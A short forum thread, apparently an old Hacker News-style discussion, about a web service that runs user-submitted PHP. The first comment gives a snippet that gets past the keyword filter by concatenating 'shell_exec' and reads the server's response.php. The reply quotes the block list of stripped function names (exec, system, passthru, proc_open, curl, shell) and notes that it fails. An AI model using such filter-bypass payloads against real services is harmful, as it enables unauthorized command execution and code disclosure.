3 ms·
Poor guy didn't think this through very well... <?php $fn = "shel" . "l_exe" . "c"; echo nl2br(htmlentities($fn("cat response.php"))); ?>
by jkkramer 17y ago
Poor guy didn't think this through very well...
<?php
$fn = "shel" . "l_exe" . "c";
echo nl2br(htmlentities($fn("cat response.php")));
?>
- colonelxc 17y agoOnly "security" is this array of items which are regexed out of whatever you submit (and as you pointed out, completely fail to even prevent those functions from being called. $replace = array('<?php', '?>', '<?', 'mkdir', 'eval', 'exec', 'copy', 'move', 'curl', 'passthru', 'system', 'popen', 'proc_close', 'proc_open', 'proc_ terminate', 'proc_nice', 'shell', 'dl');